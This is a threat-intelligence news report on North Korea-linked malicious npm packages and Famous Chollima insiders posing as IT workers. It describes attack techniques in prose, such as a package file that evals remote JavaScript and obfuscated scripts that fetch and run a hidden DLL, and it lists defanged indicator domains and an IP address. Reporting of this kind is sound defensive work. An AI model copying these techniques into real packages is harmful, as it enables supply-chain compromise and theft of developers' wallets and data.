North Korean Hackers Target Developers Using Malicious npm Packages

Threat actors linked to North Korea have been detected distributing malicious packages on the npm registry, highlighting their “coordinated and relentless” attempts to target developers with malware and steal cryptocurrency assets.

Between August 12 and 27, 2024, several packages—such as temp-etherscan-api, ethersscan-api, telegram-con, helmet-validate, and qq-console—were identified as part of this campaign.

Phylum, a software supply chain security firm, indicated that the behavior of these packages, particularly qq-console, suggests they are connected to the North Korean campaign known as “Contagious Interview.” This campaign involves deceiving developers through fake job interviews, tricking them into downloading malicious npm packages or counterfeit video conferencing software installers like MiroTalk from fraudulent websites.

The ultimate goal is to deploy a Python payload named InvisibleFerret, which extracts sensitive data from cryptocurrency wallet browser extensions and maintains persistence on the host using legitimate remote desktop software such as AnyDesk. CrowdStrike is tracking this activity under the name Famous Chollima.

The new package helmet-validate introduces a novel method by embedding a JavaScript file called config.js that executes JavaScript hosted on a remote domain (“ipcheck[.]cloud”) using the eval() function.

Phylum noted that ipcheck[.]cloud resolves to the same IP address (167[.]88[.]36[.]13) previously associated with mirotalk[.]net, suggesting a connection between the two attacks.

Another package, sass-notification, was uploaded on August 27, 2024, and resembles previously identified npm libraries like call-blockflow, which are linked to another North Korean threat group called Moonstone Sleet. These attacks are characterized by obfuscated JavaScript used to execute batch and PowerShell scripts that download, decrypt, and run a remote payload as a DLL, while attempting to erase all traces of malicious activity, leaving a seemingly harmless package on the victim’s machine.

Famous Chollima Posing as IT Workers in U.S. Firms

The revelation comes as CrowdStrike associates Famous Chollima (formerly BadClone) with insider threat operations where they infiltrate corporate environments under the guise of legitimate employment.

“Famous Chollima conducted these operations by securing contract or full-time positions using falsified or stolen identities to bypass background checks,” the company reported. “During the job application process, these malicious insiders often presented résumés with prior employment at well-known companies, including additional lesser-known firms and no employment gaps.”

While these attacks are primarily financially motivated, some incidents have involved the theft of sensitive information. CrowdStrike has identified threat actors applying to or working at over 100 unique companies in the past year, with a majority based in the U.S., Saudi Arabia, France, the Philippines, and Ukraine, among others.

Targeted sectors include technology, fintech, financial services, professional services, retail, transportation, manufacturing, insurance, pharmaceutical, social media, and media companies.

“Once insiders gained access to victim networks, they performed minimal tasks related to their job roles,” the company added. In some cases, they also attempted to exfiltrate data using Git, SharePoint, and OneDrive.

“Additionally, insiders installed various remote management tools like RustDesk, AnyDesk, TinyPilot, VS Code Dev Tunnels, and Google Chrome Remote Desktop. These tools were used alongside company network credentials, allowing multiple IP addresses to access the victim’s system.”